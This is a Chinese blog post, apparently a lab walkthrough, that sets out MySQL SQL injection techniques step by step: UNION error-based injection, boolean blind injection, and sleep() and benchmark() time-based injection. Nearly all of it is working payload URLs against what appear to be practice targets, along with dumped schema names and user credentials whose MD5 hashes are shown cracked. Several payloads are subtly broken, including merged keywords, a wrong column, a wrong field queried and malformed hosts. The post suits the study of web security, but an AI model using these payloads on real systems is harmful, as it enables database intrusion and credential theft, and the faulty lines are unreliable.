Mysql常见注入
Posted zzh%100
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Mysql常见注入相关的知识,希望对你有一定的参考价值。
mysql显错注入
1.判断注入类型为字符型:http://219.153.49.228:43074/new_list.php?id=tingjigonggao‘ and 1=1 --+
2.判断字段为4:http://219.153.49.228:43074/new_list.php?id=tingjigonggao‘ order by 4--+
3.union报错:http://219.153.49.228:43074/new_list.php?id=tingjigonggao‘ and 1=2 union select 1,2,3,4 --+
4.爆当前数据库和版本:http://219.153.49.228:43074/new_list.php?id=tingjigonggao‘ and 1=2 union select 1,database(),version(),4 --+
数据库:mozhe_discuz_stormgroup
版本:10.2.15-MariaDB-log
5.继续判断其它数据库:union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit *,1(*为0~n,直到页面返回为空)
数据库
information_schema
mozhe_discuz_stormgroup
mysql
performance_schema
test
6.爆mozhe_discuz_stormgroup库中表:union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA=‘需要查的数据库名‘ limit *,1(*为0~n,直到页面返回为空)
notice
stormgroup_member
7.爆stormgroup_member表中字段:union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=‘mozhe_discuz_stormgroup‘ and TABLE_NAME=‘stormgroup_member‘ limit *,1(*为0~n,直到页面返回为空)
id
name
password
status
8.爆字段中的数据:union select 1,CONCAT(id,‘-‘,name,‘-‘,password,‘-‘,status),3,4 from mozhe_discuz_stormgroup.stormgroup_member limit *,1(*为0~n,直到页面返回为空)
1-mozhe-46e65165c36b3167530b4837a605f086-1
md5解密后:1-mozhe-389699-1
2-mozhe-356f589a7df439f6f744ff19bb8092c0-0
md5解密后:2-mozhe-dsan13-0
注:status状态为0,账户不可用
Mysql布尔值盲注
1.数据库长度:http://219.153.49.228:42875/new_list.php?id=1 and length(database())=10 --+
2.爆数据库名:
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),1,1))=115 --+ s
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),2,1))=116 --+ t
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),3,1))=111--+ o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),4,1))=114--+ r
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),5,1))=109--+ m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),6,1))=103--+ g
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),7,1))=114--+ r
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),8,1))=111--+ o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),9,1))=117--+ u
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),10,1))=112--+ p
数据库名:stormgroup
3.爆表名:
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),1,1))=109 --+ m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),2,1))=101 --+ e
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),3,1))=109 --+ m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),4,1))=98 --+ b
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),5,1))=101 --+ e
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),6,1))=114 --+ r
表一:member
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),1,1))=110 --+ n
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),2,1))=111 --+ o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),3,1))=116 --+ t
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),4,1))=105 --+ i
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),5,1))=99 --+ c
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),6,1))=101 --+ e
表二:notice
3.爆字段:
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1))=4 --+ 长度为4
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1),1,1))=110 --+ n
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1),2,1))=97 --+ a
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1),2,1))=109 --+ m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select dump from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1),2,1))=101 --+ e
字段一:name
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 1,1))=8 --+
字段二:猜想为password
字段三
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 2,1))=6 --+ 长度为6,猜想字段名为status(显示1账户可用,0不可用)
4.爆字段内容:
先爆status字段内容:
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(status) from stormgroup.member limit 0,1))=1 --+ 长度为一
http://219.153.49.228:42875/new_list.php?id=1 andascii(substr((select CONCAT(name) from stormgroup.member limit 0,1),1,1))=48 --+ 0
账户状态为0不可用
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(status) from stormgroup.member limit 1,1))=1 --+ 长度为一
http://219.153.49.228:42875/new_list.php?id=1 andascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),1,1))=49 --+ 1
账户状态为1可用
name字段
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(name) from stormgroup.member limit 1,1))=5 --+ 长度为5
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),1,1))=109 --+ m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),2,1))= 111--+ o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),3,1))=122 --+ z
.......猜想库名为mozhe
password字段
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(password) from stormgroup.member limit 1,1))=32 --+ 长度为32。。。。晕,太多了,上sqlmap,拿32位md5值。
Mysql延时注入
判断是否存在注入
http://10.0.0.21/yanci.php?username=root‘ and sleep(5)%23
或者
http://10.0.0.21/yanci.php?username=root‘ and sleep(5) and ‘xRsl‘=‘xRsl#
Sleep函数注入查询当前数据库名的第一个符号
http://10.0.0.21/yanci.php?username=root‘ and If(ascii(substr(database(),1,1))=114,1,sleep(5))#
替换database()为其他符号时可以查询其他信息,如:
1.爆数据库的版本长度
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((version()))=6,sleep(10),1)--+
2.爆数据库版本的第一个字符
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(ascii(substr(version(),1,1))=53,sleep(10),1)--+
3.爆第一个数据库的长度
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((select schema_name from information_schema.schemata limit 0,1))=18,sleep(10),1)--+
4.爆第一个数据库的第一个字符
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(10),1)--+
这里通过改变limit后的值来确定第几个数据库,第一个数据库的下标为0,依次往后推就是其他的数据库
5.爆security数据库里的第四个表的长度
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1))=5,sleep(10),1)--+
6.爆security数据库里的第四个表的第一个字符
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1),1,1))=117,sleep(10),1)--+
7.爆security数据库里的users表的第二个字段长度
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1))=8,sleep(10),1)--+
8.爆security数据库里的users表的第二个字段的第一个字符
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(ascii(substr((select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1),1,1))=117,sleep(10),1)--+
9.爆security数据库里的users表的第二个字段的第一个数据的长度
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((select username from security.users limit 0,1))=4,sleep(10),1)--+
Benchmark()函数基于时间延迟注入
BENCHMARK(count,expr) 函数重复count次执行表达式expr,它可以用于计时MySQL处理表达式有多快,结果值总是0
1、判断注入点
http://127.0.0.1:4609/?id=1 and if(1=0,1, sleep(10)) --+
2、判断数据库版本第一个字符是否为 5 ?
http://127.0.0.1:4610/?id=1 and if(left(version(),1)=5,(select benchmark(10000000,md5(0x41))),1) --+
3、判断数据库连接用户名长度是否为 18?
http://127.0.0.1:4610/?id=1 and if(length(user())=18,(select benchmark(10000000,md5(0x41))),1) --+
4、判断用户名前18个字符是否为 sql_user@localhost ?
http://127.0.0.14610/?id=1 and if(left(user(),18)=‘sql_user@localhost‘,(select benchmark(10000000,md5(0x41))),1) --+
5、判断数据库名长度是否为 6?
http://127.0.0.1:4610/?id=1 and if(length(database())=6,(select benchmark(10000000,md5(0x41))),1) --+
6、判断数据库名第一个字符是否为 s?
http://127.0.0.14610/?id=1 and if(ascii(substring((database()),1,1))=115,(select benchmark(10000000,md5(0x41))),1) --+
依次类推......
--------------------------------------------------
7、判断表名长度是否为 4 ?
http://127.0.0.1:4610/?id=1 andif(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4,(select benchmark(10000000,md5(0x41))),1) --+
8、判断表名第一个字符是否为 f ?
http://127.0.0.1:4610/?id=1 and if(left((select table_name from information_schema.tables wheretable_schema=database() limit 1,1),1)=‘f‘,(select benchmark(10000000,md5(0x41))),1) --+
依次类推......
--------------------------------------------------
9、判断列名长度是否为 4?
http://127.0.0.1:4610/?id=1 and if(length((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1))=4,(select benchmark(10000000,md5(0x41))),1) --+
10、判断列名第一个字符是否为 f ?
http://127.0.0.1:4610/?id=1 and if(left((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1),1)=‘f‘,(select benchmark(10000000,md5(0x41))),1) --+
依次类推......
--------------------------------------------------
11、判断字段内容值长度是否为 14?
http://127.0.0.1:4610/?id=1 and if(length((select flag from flag limit 0,1))=14,(select benchmark(10000000,md5(0x41))),1) --+
12、判断列名字段内容值第一位字符是否为 w ?
http://127.0.0.1:4610/?id=1 and if(left((select flag from flag limit 0,1),1)=‘w‘,(select benchmark(10000000,md5(0x41))),1) --+
或者
http://127.0.0.1:4610/?id=1 andif(ascii(substring((SELECT flag FROM flag),1,1))=119,(select benchmark(10000000,md5(0x41))),1) --+
以上是关于Mysql常见注入的主要内容,如果未能解决你的问题,请参考以下文章
以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?
初识Spring源码 -- doResolveDependency | findAutowireCandidates | @Order@Priority调用排序 | @Autowired注入(代码片段